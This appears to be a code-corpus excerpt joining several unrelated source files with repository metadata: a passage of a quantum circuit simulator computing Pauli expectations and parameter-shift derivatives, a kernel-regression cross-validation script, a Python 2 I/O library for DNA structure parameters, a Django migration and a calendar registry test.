nmeasurement=nmeasurement,
)
def run_pauli_expectation(
self,
circuit,
pauli,
nmeasurement=None,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
if nmeasurement is None:
return self.run_pauli_expectation_ideal(
circuit=circuit,
pauli=pauli,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
else:
return self.run_pauli_expectation_measurement(
circuit=circuit,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
def run_pauli_expectation_value(
self,
circuit,
pauli,
nmeasurement=None,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
if nmeasurement is None:
return self.run_pauli_expectation_value_ideal(
circuit=circuit,
pauli=pauli,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
else:
pauli_expectation = self.run_pauli_expectation_measurement(
circuit=circuit,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
return pauli_expectation.dot(pauli)
def run_pauli_expectation_value_gradient(
self,
circuit,
pauli,
nmeasurement=None,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
parameter_indices=None,
**kwargs):
# Current circuit parameter values
parameter_values = circuit.parameter_values
# Default to taking the gradient with respect to all parameters
if parameter_indices is None:
parameter_indices = list(range(len(parameter_values)))
# Check that the gradient formula is known for these parameters (i.e., Rx, Ry, Rz gates)
parameter_keys = circuit.parameter_keys
for parameter_index in parameter_indices:
key = parameter_keys[parameter_index]
times, qubits, key2 = key
gate = circuit.gates[(times, qubits)]
if gate.name not in ('Rx', 'Ry', 'Rz'):
raise RuntimeError('Unknown gradient rule: presently can only differentiate Rx, Ry, Rz gates: %s' % gate)
# Evaluate the gradient by the parameter shift rule
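# (Assumed angle convention: for these rotation gates the two-term shift rule
#  is exact, dE/dtheta = E(theta + pi/4) - E(theta - pi/4), which is why the
#  code below shifts by +/- pi/4 with a unit prefactor -- this is not a
#  finite-difference approximation.)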
gradient = np.zeros((len(parameter_indices),), dtype=dtype)
circuit2 = circuit.copy()
for index, parameter_index in enumerate(parameter_indices):
# +
parameter_values2 = parameter_values.copy()
parameter_values2[parameter_index] += np.pi / 4.0
circuit2.set_parameter_values(parameter_values2)
Ep = self.run_pauli_expectation_value(
circuit=circuit2,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
# -
parameter_values2 = parameter_values.copy()
parameter_values2[parameter_index] -= np.pi / 4.0
circuit2.set_parameter_values(parameter_values2)
Em = self.run_pauli_expectation_value(
circuit=circuit2,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
# Assembly
gradient[index] = Ep - Em
return gradient
def run_pauli_expectation_value_hessian(
self,
circuit,
pauli,
nmeasurement=None,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
parameter_pair_indices=None,
**kwargs):
# Current circuit parameter values
parameter_values = circuit.parameter_values
# Default to taking the Hessian with respect to all parameter pairs
if parameter_pair_indices is None:
parameter_pair_indices = []
for i in range(len(parameter_values)):
for j in range(len(parameter_values)):
parameter_pair_indices.append((i,j))
# Check that the Hessian formula is known for these parameters (i.e., Rx, Ry, Rz gates)
parameter_keys = circuit.parameter_keys
for parameter_index1, parameter_index2 in parameter_pair_indices:
key = parameter_keys[parameter_index1]
times, qubits, key2 = key
gate = circuit.gates[(times, qubits)]
if gate.name not in ('Rx', 'Ry', 'Rz'):
raise RuntimeError('Unknown Hessian rule: presently can only differentiate Rx, Ry, Rz gates: %s' % gate)
key = parameter_keys[parameter_index2]
times, qubits, key2 = key
gate = circuit.gates[(times, qubits)]
if gate.name not in ('Rx', 'Ry', 'Rz'):
raise RuntimeError('Unknown Hessian rule: presently can only differentiate Rx, Ry, Rz gates: %s' % gate)
# Evaluate the Hessian by the iterated parameter-shift rule
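# (Same assumed convention, applied once per parameter:
#  d2E/(dtheta_i dtheta_j) = E(++) - E(+-) - E(-+) + E(--),
#  with independent +/- pi/4 shifts on each of the two parameters.)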
hessian = np.zeros((len(parameter_pair_indices),), dtype=dtype)
circuit2 = circuit.copy()
for index, parameter_pair_index in enumerate(parameter_pair_indices):
parameter_index1, parameter_index2 = parameter_pair_index
symmetric = (parameter_index2, parameter_index1) in parameter_pair_indices
if symmetric and parameter_index1 > parameter_index2: continue
# ++
parameter_values2 = parameter_values.copy()
parameter_values2[parameter_index1] += np.pi / 4.0
parameter_values2[parameter_index2] += np.pi / 4.0
circuit2.set_parameter_values(parameter_values2)
Epp = self.run_pauli_expectation_value(
circuit=circuit2,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
# +-
parameter_values2 = parameter_values.copy()
parameter_values2[parameter_index1] += np.pi / 4.0
parameter_values2[parameter_index2] -= np.pi / 4.0
circuit2.set_parameter_values(parameter_values2)
Epm = self.run_pauli_expectation_value(
circuit=circuit2,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
# -+
parameter_values2 = parameter_values.copy()
parameter_values2[parameter_index1] -= np.pi / 4.0
parameter_values2[parameter_index2] += np.pi / 4.0
circuit2.set_parameter_values(parameter_values2)
Emp = self.run_pauli_expectation_value(
circuit=circuit2,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
# --
parameter_values2 = parameter_values.copy()
parameter_values2[parameter_index1] -= np.pi / 4.0
parameter_values2[parameter_index2] -= np.pi / 4.0
circuit2.set_parameter_values(parameter_values2)
Emm = self.run_pauli_expectation_value(
circuit=circuit2,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
# Assembly
hessian[index] = Epp - Epm - Emp + Emm
if symmetric:
hessian[parameter_pair_indices.index((parameter_index2, parameter_index1))] = hessian[index]
return hessian
def run_pauli_expectation_value_gradient_pauli_contraction(
self,
circuit,
pauli,
parameter_coefficients,
nmeasurement=None,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
parameter_indices=None,
**kwargs):
# Current circuit parameter values
parameter_values = circuit.parameter_values
# Default to taking the gradient with respect to all parameters
if parameter_indices is None:
parameter_indices = list(range(len(parameter_values)))
# Check that parameter coefficients make sense
if len(parameter_coefficients) != len(parameter_indices):
raise RuntimeError('len(parameter_coefficients) != len(parameter_indices)')
# Check that the gradient formula is known for these parameters (i.e., Rx, Ry, Rz gates)
parameter_keys = circuit.parameter_keys
for parameter_index in parameter_indices:
key = parameter_keys[parameter_index]
times, qubits, key2 = key
gate = circuit.gates[(times, qubits)]
if gate.name not in ('Rx', 'Ry', 'Rz'):
raise RuntimeError('Unknown gradient rule: presently can only differentiate Rx, Ry, Rz gates: %s' % gate)
# Evaluate the gradient by the parameter shift rule
pauli_gradient = PauliExpectation.zero()
circuit2 = circuit.copy()
for index, parameter_index in enumerate(parameter_indices):
# +
parameter_values2 = parameter_values.copy()
parameter_values2[parameter_index] += np.pi / 4.0
circuit2.set_parameter_values(parameter_values2)
Gp = self.run_pauli_expectation(
circuit=circuit2,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
# -
parameter_values2 = parameter_values.copy()
parameter_values2[parameter_index] -= np.pi / 4.0
circuit2.set_parameter_values(parameter_values2)
Gm = self.run_pauli_expectation(
circuit=circuit2,
pauli=pauli,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
# Assembly
pauli_gradient += parameter_coefficients[index] * (Gp - Gm)
return pauli_gradient
# => Utility Methods <= #
def run_pauli_expectation_ideal(
self,
circuit,
pauli,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
min_qubit = pauli.min_qubit if min_qubit is None else min_qubit
nqubit = pauli.nqubit if nqubit is None else nqubit
statevector = self.run_statevector(
circuit=circuit,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
pauli_expectation = PauliExpectation.zero()
for string in pauli.keys():
pauli2 = Pauli.zero()
pauli2[string] = 1.0
statevector2 = self.run_pauli_sigma(
pauli=pauli2,
statevector=statevector,
dtype=dtype,
min_qubit=min_qubit,
nqubit=nqubit,
)
scal = np.sum(statevector.conj() * statevector2)
pauli_expectation[string] = scal
return pauli_expectation
def run_pauli_expectation_value_ideal(
self,
circuit,
pauli,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
statevector = self.run_statevector(
circuit=circuit,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
statevector2 = self.run_pauli_sigma(
pauli=pauli,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
return np.sum(statevector.conj() * statevector2)
# => Measurement-based Pauli expectations <= #
# TODO: As always, there remains much work to be done in the conceptual,
# pragmatical, and syntactical elements of this functionality
def run_pauli_expectation_measurement(
self,
circuit,
pauli,
nmeasurement,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
min_qubit = pauli.min_qubit if min_qubit is None else min_qubit
nqubit = pauli.nqubit if nqubit is None else nqubit
# Determine commuting group
groups = self.linear_commuting_group(
pauli,
min_qubit=min_qubit,
nqubit=nqubit,
)
# (linear_commuting_group raises if any string fits no commuting group)
# TODO: Optimally cover all commuting groups
# Modified circuits for basis transformations
circuits = [self.circuit_in_basis(
circuit,
basis,
min_qubit=min_qubit,
nqubit=nqubit,
)
for basis in groups.keys()]
# Measurements in commuting group (quantum heavy)
probabilities = [self.run_measurement(
circuit=circuit,
nmeasurement=nmeasurement,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs) for circuit in circuits]
# Convert to counts
results = [_.to_count_histogram() for _ in probabilities]
# Counts for pauli strings
counts = { _ : 0 for _ in pauli.keys() }
ns = { _ : 0 for _ in pauli.keys() }
for group, result in zip(groups.keys(), results):
strings = groups[group]
for string in strings:
qubits = string.qubits
ns[string] += nmeasurement
for ket, count in result.items():
parity = sum((ket & (1 << (nqubit - 1 - (_ - min_qubit)))) >> (nqubit - 1 - (_ - min_qubit)) for _ in qubits) % 2
counts[string] += (-count) if parity else (+count)
# Pauli density matrix values
pauli_expectation = PauliExpectation(collections.OrderedDict([
(_, counts[_] / max(ns[_], 1)) for _ in pauli.keys()]))
if PauliString.I() in pauli_expectation:
pauli_expectation[PauliString.I()] = 1.0
return pauli_expectation
@staticmethod
def linear_commuting_group(
pauli,
min_qubit=None,
nqubit=None,
):
min_qubit = pauli.min_qubit if min_qubit is None else min_qubit
nqubit = pauli.nqubit if nqubit is None else nqubit
keys = sortedcontainers.SortedSet()
for string in pauli.keys():
for qubit, char in string:
keys.add(char)
groups = collections.OrderedDict()
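# Candidate measurement bases are length-nqubit strings with a period-2
# pattern, e.g. 'ZZZZ...' or 'XYXY...'; a Pauli string joins a group when
# every non-identity character matches the basis at that qubit.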
for keyA in keys:
for keyB in keys:
groups[((keyA + keyB)*nqubit)[:nqubit]] = []
for string in pauli.keys():
# Do not do the identity operator
if string.order == 0: continue
# Add to all valid commuting groups
found = False
for group, strings2 in groups.items():
valid = True
for qubit, char in string:
if group[qubit - min_qubit] != char:
valid = False
break
if not valid: continue
strings2.append(string)
found = True
if not found: raise RuntimeError('Invalid string - not in linear commuting group: %s' % str(string))
return groups
@staticmethod
def circuit_in_basis(
circuit,
basis,
min_qubit=None,
nqubit=None,
):
min_qubit = circuit.min_qubit if min_qubit is None else min_qubit
nqubit = circuit.nqubit if nqubit is None else nqubit
if len(basis) != nqubit: raise RuntimeError('len(basis) != nqubit')
basis_circuit = Circuit()
for A, char in enumerate(basis):
qubit = A - min_qubit
if char == 'X': basis_circuit.H(qubit)
elif char == 'Y': basis_circuit.Rx2(qubit)
elif char == 'Z': continue # Computational basis
else: raise RuntimeError('Unknown basis: %s' % char)
return Circuit.join_in_time([circuit, basis_circuit])
# => Subset Hamiltonian Utilities <= #
def run_pauli_matrix_subset(
self,
pauli,
kets,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
):
min_qubit = pauli.min_qubit if min_qubit is None else min_qubit
nqubit = pauli.nqubit if nqubit is None else nqubit
if len(set(kets)) != len(kets):
raise RuntimeError('Kets are not unique')
kets2 = { ket : index for index, ket in enumerate(kets) }
H = np.zeros((len(kets),)*2, dtype=np.complex128)
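# Apply each Pauli string to the computational basis state |ket>: Z adds a
# sign, X flips the bit, Y flips the bit and adds a factor of +/-1j; qubit
# indices count from the most significant bit.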
for ket_index, ket in enumerate(kets):
for string, value in pauli.items():
value = value + 0.j # Make sure value is complex
bra = ket
for qubit2, char in string:
qubit = qubit2 - min_qubit
if char == 'Z':
value *= -1.0 if (ket & (1 << (nqubit - 1 - qubit))) else 1.0
elif char == 'X':
bra ^= (1 << (nqubit - 1 - qubit))
elif char == 'Y':
value *= -1.j if (ket & (1 << (nqubit - 1 - qubit))) else 1.j
bra ^= (1 << (nqubit - 1 - qubit))
bra_index = kets2.get(bra, None)
if bra_index is None: continue
H[bra_index, ket_index] += value
return np.array(H, dtype=dtype)
| 33.399738
| 133
| 0.563059
|
723021b8eb8d9fb63d046c7bfbc34fe72d6eda3b
| 3,000
|
py
|
Python
|
Model/Analyzer.py
|
Wenbintum/wwl_github
|
adee8de1be0f92228abd09606fee8825a8368f04
|
[
"MIT"
] | null | null | null |
Model/Analyzer.py
|
Wenbintum/wwl_github
|
adee8de1be0f92228abd09606fee8825a8368f04
|
[
"MIT"
] | null | null | null |
Model/Analyzer.py
|
Wenbintum/wwl_github
|
adee8de1be0f92228abd09606fee8825a8368f04
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
from sklearn.model_selection import KFold
import numpy as np
from ML_learning import Train_gpr, Train_krr
from sklearn.metrics import mean_absolute_error, mean_squared_error
from statistics import mean
def plt_distribution(x, n_bin, dpi=100):
fig, axs = plt.subplots(tight_layout=True)
#fig, axs = plt.subplots(1, 2, tight_layout=True) #sharey=True
axs.hist(x, bins=n_bin)
axs.set_xlabel('Adsorption energy (eV)')
axs.set_ylabel('Numbers')
# axs[1].hist(x, bins=n_bin, density=True)
# axs[1].yaxis.set_major_formatter(PercentFormatter(xmax=1))
plt.savefig('distribution.png',dpi=dpi)
def Check_outlier(target,prediction,name_list,threshold=0.5):
outlier_list = {}
for target_i, pred_i, name_i in zip(target, prediction, name_list):
abs_error = abs(target_i - pred_i)
if abs_error > threshold:
# record the outlier's file name together with its absolute error
outlier_list[name_i] = abs_error
return dict(sorted(outlier_list.items(), key=lambda item: item[1]))
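# e.g. Check_outlier([1.0, 2.0], [1.1, 2.8], ['a', 'b']) -> {'b': ~0.8}
# (only 'b' exceeds the 0.5 eV threshold; entries sorted by error, ascending)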
def KF_validation(kernel_matrix, y, ML_method, name_list=None,
                  n_split=5, shuffle=True, random_state=0
                  ):
    """K-fold cross-validation on a precomputed (n x n) kernel matrix.

    name_list must be an indexable array of sample names (used for outlier
    reporting). Returns the average train/test MAE and RMSE over the folds,
    plus the dictionary of test outliers collected by Check_outlier.
    """
    kf = KFold(n_splits=n_split, shuffle=shuffle, random_state=random_state)
    train_RMSEs, train_MAEs, test_RMSEs, test_MAEs, test_outliers = [], [], [], [], {}
    # KFold only needs something of length n to generate indices, hence row 0
    for train_index, test_index in kf.split(kernel_matrix[0], y):
        # Slice the precomputed kernel into train/train and test/train blocks
        train_matrix = kernel_matrix[train_index][:, train_index]
        test_matrix = kernel_matrix[test_index][:, train_index]
        y_train, y_test = y[train_index], y[test_index]
        name_train, name_test = name_list[train_index], name_list[test_index] #outlier
        # Train a model on the kernel block
        if ML_method == 'gpr':
            ml_model = Train_gpr(train_matrix, y_train)
        elif ML_method == 'krr':
            ml_model = Train_krr(train_matrix, y_train)
        else:
            raise ValueError('Unknown ML_method: %s' % ML_method)
        # Predict on the training and validation folds
        train_pre = ml_model.predict(train_matrix)
        test_pre = ml_model.predict(test_matrix)
        test_outlier = Check_outlier(y_test, test_pre, name_test)
        # Evaluate MAE and RMSE (y_true first, then predictions)
        train_MAE = mean_absolute_error(y_train, train_pre)
        test_MAE = mean_absolute_error(y_test, test_pre)
        train_RMSE = mean_squared_error(y_train, train_pre, squared=False)
        test_RMSE = mean_squared_error(y_test, test_pre, squared=False)
        # Collect per-fold scores
        train_MAEs.append(train_MAE)
        train_RMSEs.append(train_RMSE)
        test_MAEs.append(test_MAE)
        test_RMSEs.append(test_RMSE)
        test_outliers.update(test_outlier)
    avr_train_MAE = mean(train_MAEs)
    avr_test_MAE = mean(test_MAEs)
    avr_train_RMSE = mean(train_RMSEs)
    avr_test_RMSE = mean(test_RMSEs)
    return avr_train_MAE, avr_train_RMSE, avr_test_MAE, avr_test_RMSE, test_outliers
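if __name__ == '__main__':
    # Smoke-test sketch on synthetic data (assumption: KF_validation accepts any
    # precomputed square kernel; a random linear kernel stands in for the real one).
    rng = np.random.RandomState(0)
    X = rng.normal(size=(40, 5))
    K = np.dot(X, X.T)                                   # (40, 40) linear kernel
    y = rng.normal(size=40)
    names = np.array(['sample_%d' % i for i in range(40)])
    scores = KF_validation(K, y, 'krr', name_list=names)
    print('avg train MAE/RMSE, test MAE/RMSE:', scores[:4])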
| 42.857143 | 86 | 0.698 |
a2fb82aa0b9481e7f58a554cb23f7358841777fe | 6,261 | py | Python | system/IOlib.py | haddocking/3D-DART | c94ab30f8d96ab1232d55ed136bc8299dcaa5112 | ["Apache-2.0"] | 2 | 2020-07-23T09:27:00.000Z | 2021-06-23T14:47:33.000Z | system/IOlib.py | haddocking/3D-DART | c94ab30f8d96ab1232d55ed136bc8299dcaa5112 | ["Apache-2.0"] | 3 | 2020-04-23T15:28:57.000Z | 2020-08-27T07:52:25.000Z | system/IOlib.py | haddocking/3D-DART | c94ab30f8d96ab1232d55ed136bc8299dcaa5112 | ["Apache-2.0"] | 4 | 2020-02-25T12:57:57.000Z | 2021-06-23T14:47:40.000Z |
#!/usr/bin/env python2.7
import os,sys,re
from Utils import *
from numpy import *
from Constants import *
def WritePar(database,filename,verbose=False):
"""Write 3DNA base-pair and base-pair step parameter file (*.par)"""
    if filename is None:
filename = 'parfile'
    if verbose:
outfile = sys.stdout
else:
MakeBackup(os.path.splitext(filename)[0]+'.par')
outfile = file(os.path.splitext(filename)[0]+'.par','w')
print(" * Writing new parameter file with name %s" % filename)
for param in BASEPAIR_STEPS: #All first values for base-pair step parameters are always 0
database.Update(param,float(0),0)
outfile.write(" %s base-pairs\n" % len(database['sequence']))
outfile.write(" 0 ***local base-pair & step parameters***\n")
outfile.write(" Shear Stretch Stagger Buckle Prop-Tw Opening Shift Slide Rise Tilt Roll Twist\n")
for n in range(len(database['sequence'])):
outfile.write("%s %7.2f %7.2f %7.2f %7.2f %7.2f %7.2f %7.2f %7.2f %7.2f %7.2f %7.2f %7.2f\n" % (database['sequence'][n],database['shear'][n],
database['stretch'][n],database['stagger'][n],database['buckle'][n],database['proptw'][n],database['opening'][n],
database['shift'][n],database['slide'][n],database['rise'][n],database['tilt'][n],database['roll'][n],database['twist'][n]))
    if not verbose:
outfile.close()
class InputOutputControl:
"""Acts as a plugin input and output control. Input and output requirements are checked against extensions or files.
Generation and use of files within the plugin are controled by this class in a similar manner"""
def __init__(self):
self.checkedinput = {}
def _CheckFile(self,files,requirements):
        if requirements in (None, 'None'):
extensions = []
for n in files:
ext = os.path.splitext(n)[1]
                if ext not in extensions:
                    extensions.append(ext)
for extension in extensions:
self.checkedinput[extension] = []
else:
splitter = re.compile(',')
requirements = splitter.split(requirements)
for requirement in requirements:
self.checkedinput[requirement] = []
for n in files:
if os.path.isfile(n):
extension = os.path.splitext(n)[1]
if self.checkedinput.has_key(extension):
self.checkedinput[extension].append(n)
elif self.checkedinput.has_key(os.path.basename(n)):
self.checkedinput[os.path.basename(n)].append(n)
else:
print " * InputCheck ERROR: file", n, "not found"
def CheckInput(self,files,requirements=None):
filelist = []
if type(files) == type(""):
filelist.append(files)
elif type(files) == type([]):
filelist = files
        # Appending while iterating deliberately extends the loop, so nested
        # 'selection.list' files are expanded as well
        for entry in filelist:
            if os.path.basename(entry) == 'selection.list':
                readfile = open(entry, 'r')
                lines = readfile.readlines()
                readfile.close()
                for line in lines:
                    filelist.append(line.strip())
self._CheckFile(filelist,requirements)
def InputUpdate(self,reference,required):
"""Update the dictionary of files"""
self.checkedinput[required] = []
for n in self.checkedinput[reference]:
expected = RenameFilepath(n,path=os.getcwd(),extension=required)
if os.path.isfile(expected):
self.checkedinput[required].append(expected)
else:
print " * InputCheck ERROR: file", expected, "expected but not found"
def CheckOutput(self,files,requirements=None):
"""Check if required output is generated"""
if not requirements or requirements == 'self':
requirements = []
else:
splitter = re.compile(',')
requirements = splitter.split(requirements)
inputfiles = self.DictToList()
output_expect = []
for a in inputfiles:
basename, extension = os.path.splitext(os.path.basename(a))
for requirement in requirements:
if requirement[0] in ['.','_']: output_expect.append(basename+requirement)
for requirement in requirements:
if not requirement[0] in ['.','_']: output_expect.append(requirement)
for a in output_expect:
if not os.path.isfile(a): print " * WARNING: file:", a, "is not present in the output"
"""True output"""
output_true = []
for a in files:
output_true.append(os.path.join(os.getcwd(),a))
return output_true
def DictToList(self):
"""Return dictionary as plain list of files"""
filelist = []
for n in self.checkedinput:
filelist = filelist+self.checkedinput[n]
return filelist
class DatabaseDeamon:
"""This module allows for the quick construction, maipualtion and export of databses.
The database is constructed as aq library, data is stored depending on type as either
an array of values (floats) or a list of strings"""
def __init__(self):
self.database = {}
def __getitem__(self,key):
"""Retrieve data from database"""
return self.database[key]
def _TypeCheck(self,data):
"""Check input on type 'float','integer','string','list',or single value. If None
of these return None"""
checked = []
datatype = None
if type(data) == type([]):
for items in data:
try:
checked.append(float(items))
except:
checked.append(items)
elif isinstance(data, float) or isinstance(data, int):
checked.append(float(data))
elif isinstance(data, str):
checked.append(data)
elif isinstance(data, type(array(0))):
checked = data
else:
checked = None
return checked
    def Update(self,key,item,index=None):
        """Update data in database. Update the complete dataset for a given database
        entry or update a single value in the dataset at the given index."""
        if index is not None:
            if self.database.has_key(key):
                try:
                    self.database[key][index] = self._TypeCheck(item)[0]
                except:
                    print(" * ERROR: failed database update of dataset %s at index %i\n" % (key,index))
        else:
            if self.database.has_key(key):
                if len(item) == len(self.database[key]):
                    self.database[key] = self._TypeCheck(item)
                else:
                    print(" * DATABASE-ERROR: new list of items does not match length of old list")
def Load(self,name,data):
"""Load checked data in database"""
self.database[name] = self._TypeCheck(data)
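if __name__ == '__main__':
    # Minimal sketch (illustrative values only; assumes BASEPAIR_STEPS names a
    # subset of the parameters loaded below): build a 2-step parameter database
    # and print it as a .par file to stdout.
    db = DatabaseDeamon()
    db.Load('sequence', ['A-T', 'G-C'])
    for par in ('shear','stretch','stagger','buckle','proptw','opening',
                'shift','slide','rise','tilt','roll','twist'):
        db.Load(par, [0.0, 0.0])
    db.Update('twist', 34.3, 1)        # set the twist of the second step
    WritePar(db, 'demo', verbose=True) # verbose=True writes to stdout, no file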
| 29.533019 | 143 | 0.665069 |
4ed2727b95f3d9895506888e51daf3d440768d5d | 1,191 | py | Python | django/gsmap/migrations/0013_auto_20200405_1555.py | n0rdlicht/spatial-data-package-platform | 97659a5f5e3df1ee78c31a3d0cee7bcab0c34c22 | ["MIT"] | 14 | 2020-11-26T11:20:55.000Z | 2022-03-02T15:48:51.000Z | django/gsmap/migrations/0013_auto_20200405_1555.py | n0rdlicht/spatial-data-package-platform | 97659a5f5e3df1ee78c31a3d0cee7bcab0c34c22 | ["MIT"] | 328 | 2020-11-26T16:01:06.000Z | 2022-03-28T03:15:07.000Z | django/gsmap/migrations/0013_auto_20200405_1555.py | n0rdlicht/spatial-data-package-platform | 97659a5f5e3df1ee78c31a3d0cee7bcab0c34c22 | ["MIT"] | 2 | 2020-12-01T15:08:23.000Z | 2020-12-22T14:06:30.000Z |
# Generated by Django 3.0.3 on 2020-04-05 15:55
from django.db import migrations, models
import gsmap.models
import sortedm2m.fields
class Migration(migrations.Migration):
dependencies = [
('gsmap', '0012_auto_20200405_0850'),
]
operations = [
migrations.AlterField(
model_name='snapshot',
name='permission',
field=models.IntegerField(choices=[(0, 'PUBLIC'), (10, 'NOT_LISTED')], default=gsmap.models.SnapshotPermission['PUBLIC']),
),
migrations.CreateModel(
name='Workspace',
fields=[
('id', models.CharField(max_length=8, primary_key=True, serialize=False, unique=True)),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('title', models.CharField(default='', max_length=150)),
('description', models.TextField(default='')),
('snapshots', sortedm2m.fields.SortedManyToManyField(help_text=None, to='gsmap.Snapshot')),
],
options={
'ordering': ['-created'],
},
),
]
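# To apply this migration in a project checkout one would typically run
# (assuming a standard Django manage.py setup):
#
#   python manage.py migrate gsmap 0013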
| 34.028571 | 134 | 0.577666 |
5ae64ff1dba0481fdeaca1b08764c378a783c68c | 649 | py | Python | workalendar/tests/test_registry_africa.py | ftatarli/workalendar | 111d2268f6153cfa1906823409103f5d532f7b8b | ["MIT"] | 2 | 2020-07-15T09:56:41.000Z | 2021-02-04T18:11:28.000Z | workalendar/tests/test_registry_africa.py | ftatarli/workalendar | 111d2268f6153cfa1906823409103f5d532f7b8b | ["MIT"] | null | null | null | workalendar/tests/test_registry_africa.py | ftatarli/workalendar | 111d2268f6153cfa1906823409103f5d532f7b8b | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
from unittest import TestCase
from workalendar.africa import (
Algeria,
Benin,
IvoryCoast,
Madagascar,
SaoTomeAndPrincipe,
SouthAfrica,
)
from workalendar.registry import registry
class RegistryAfrica(TestCase):
def test_africa(self):
        classes = list(registry.region_registry.values())
self.assertIn(Algeria, classes)
self.assertIn(Benin, classes)
self.assertIn(IvoryCoast, classes)
self.assertIn(Madagascar, classes)
self.assertIn(SaoTomeAndPrincipe, classes)
self.assertIn(SouthAfrica, classes)
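# The suite can be run on its own with the standard unittest runner, e.g.
# (assuming workalendar is importable):
#
#   python -m unittest workalendar.tests.test_registry_africa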
| 24.961538 | 66 | 0.681048 |